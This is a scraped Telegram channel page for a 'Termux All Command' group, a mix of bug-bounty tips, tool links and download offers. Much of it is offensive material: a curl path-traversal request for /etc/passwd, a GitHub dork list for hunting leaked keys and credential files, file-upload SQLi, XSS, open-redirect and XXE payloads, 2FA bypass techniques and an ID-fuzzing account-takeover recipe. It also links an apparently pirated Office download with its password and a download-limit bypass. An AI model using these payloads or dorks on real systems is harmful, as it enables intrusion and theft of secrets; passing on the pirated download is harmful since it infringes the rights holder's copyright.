Termux All Command [Telegram Group]
Kanalga Telegramโda oโtish
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Ko'proq ko'rsatish1 184
Obunachilar
Ma'lumot yo'q24 soatlar
+147 kunlar
+4730 kunlar
Postlar arxiv
Free Power Point Template ::
https://www.free-power-point-templates.com/
fppt.com
Name : Microsoft Office 2024 LTSC Pro Plus Free Download
Download : https://drive.google.com/file/d/1KqIp2UIm90QhyXS1CwWkrQi93ueoyYR7/view
Password : rirobin
Those Highlighter. You can use for reading blog and highlight some tontent!!
๐จ ๐จ ๐จ Too many people miss critical vulnerabilities because they assume a GET request can't have a body! ๐จ ๐จ ๐จ
This is how you can send such a request using #curl :
$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET
Rest stands for representational state transfer. Restful PSR is commonly used in web development to build scalable and efficient web services. Restful APIs provided a standardized and scalable yeah, put school building web services then can be conceived by various client access different platforms this is stateless and this is kind server this is interface gate post put delete
๐ฅ๐ฅGithub-Dork๐๐๐ฅ๐ฅ
Happy Hunting
๐ api_key
๐ app_AWS_SECRET_ACCESS_KEY
๐ app_secret
๐ authoriztion
๐ Ldap
๐ aws_access_key_id
๐ secret
๐ bash_history
๐ bashrc%20password
๐ beanstalkd
๐ client secre
๐ composer
๐ config
๐ credentials
๐ DB_PASSWORD
๐ dotfiles
๐ .env file
๐ .exs file
๐ extension:json mongolab.com
๐ extension:pem%20private
๐ extension:ppk private
๐ extension:sql mysql dump
๐ extension:yaml mongolab.com
๐ .mlab.com password
๐ mysql
๐ npmrc%20_auth
๐ passwd
๐ passkey
๐ rds.amazonaws.com password
๐ s3cfg
๐ send_key
๐ token
๐ filename:.bash_history
๐ filename:.bash_profile aws
๐ filename:.bashrc mailchimp
๐ filename:CCCam.cfg
๐ filename:config irc_pass
๐ filename:config.php dbpasswd
๐ filename:config.json auths
๐ filename:config.php pass
๐ filename:config.php dbpasswd
๐ filename:connections.xml
๐ filename:.cshrc
๐ filename:.git-credentials
๐ filename:.ftpconfig
๐ filename:.history
๐ filename:gitlab-recovery-codes.txt
๐ filename:.htpasswd
๐ filename:id_rsa
๐ filename:.netrc password
๐ FTP
๐ filename:wp-config.php
๐ git-credentials
๐ github_token
๐ HEROKU_API_KEY language:json
๐ HEROKU_API_KEY language:shell
๐ GITHUB_API_TOKEN language:shell
๐ oauth
๐ OTP
๐ databases password
๐ [WFClient] Password= extension:ica
๐ xoxa_Jenkins
๐ security_credentials
#bugbountytips #GitHub
In todayโs digital world, protecting our personal information is more important than ever. Unfortunately, malicious tools exist designed to steal this information.
One such tool is a Remote Access Trojan, also known as a RAT.
https://medium.com/@hackbyabd/what-is-a-rat-how-does-it-work-and-how-can-you-stay-safe-briefly-explain-by-hackbyabd-17308b0cebf5
This article will delve into the world of RATs, explaining what they are, how they work, and, most importantly, how you can secure yourself from falling victim to one.
Now you can detect phishing websites quickly with Nuclei:nuclei -l websites_Possible_Phishing -tags phishing -itags phishing
๐ฅChaining Vulnerabilities through File Upload๐ฅ
SLQiโณ
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversalโณ
../../etc/passwd/logo.png
../../../logo.png
XSSโณ
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1โฆ"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
Open redirect โณ
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE โณ
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
2FA Bypass Techniques
1. Response manipulation
2. Status code manipulation
3. 2FA code reusability
4. 2FA code leakage
5. Lack of brute-force protection
6. Bypassing 2FA with null or 000000
8. Missing 2FA code integrity validation
9.Handling of Previous Sessions
41 Web Vulnerability Poc videos ๐ก๏ธ
โข Sql Injection ๐
โข Remote Code Execution (RCE) ๐ป
โข Cross Site Scripting (XSS) ๐
โข Server Side Request Forgery (SSRF) ๐
โข Cross Site Request Forgery (CSRF) ๐
โข Insecure direct object references (IDOR) ๐ซ
โข Cross-origin resource sharing (CORS) ๐
โข Command Injection โ๏ธ
โข File Upload Vulnerability ๐
โข Directory Traversal ๐
โข Local File Inclusion (LFI) ๐
โข Subdomain Takeover ๐ฐ
โข Broken Link Hijacking ๐ซ
โข Information Disclosure ๐
โข XXE injection ๐ธ๏ธ
โข Clickjacking ๐
And more..! ๐จ
๐DRIVE LINK:
๐https://lnkd.in/gB9PMgQH
Finish your month's work in just 10 minutes using 5 AI tools: ๐ฅ๐ 1. FeedbackbyAI. com : 100+ page Business Report in one click. 2. Perplexity. ai : A Powerful AI Search Engine. 3. Invideo. io : Create videos for Youtube Channel from text prompt in minutes. 4. Flair AI : Powerful AI Visual Editor for your Product Photography. 5. Galileo AI : A UI generation platform, create designs easily. #most #useful #savetime #powerful #aitools #aiwebsites
1- Found login page in wayback
2- Fuzzing parameter, found parameter called ID
3- Fuzz ID with intruder in burp from 1-10000
4- Thereโs some IDโs have different content-length
5- When i use url with these IDโs thereโs JwT in response than redirect me to account
#bugbountytips
๐ฐHow to Bypass Mega Download Limit Using Megabasterd๐ฐ
FOLLOW THE STEPS1] Download MegaBasterds Software: GitHub -
https://github.com/tonikelope/megabasterd2] Unzip the files
3] Copy the mega link of file you want to download.4] Run the Mega Basterd Windows Batch file
5] Click on File option on the left corner and click on New Download6] Paste the link and start downloading!!
7) Connect to different ip when stops downloading and try again
Unmute Notification & Share Channel For More Content
https://t.me/ZerodayExploitware
terabox file download without terabox :: https://indexsubtitle.cc/terabox-direct-link-generator
Endi mavjud! Telegram Tadqiqoti 2025 โ yilning asosiy insaytlari 
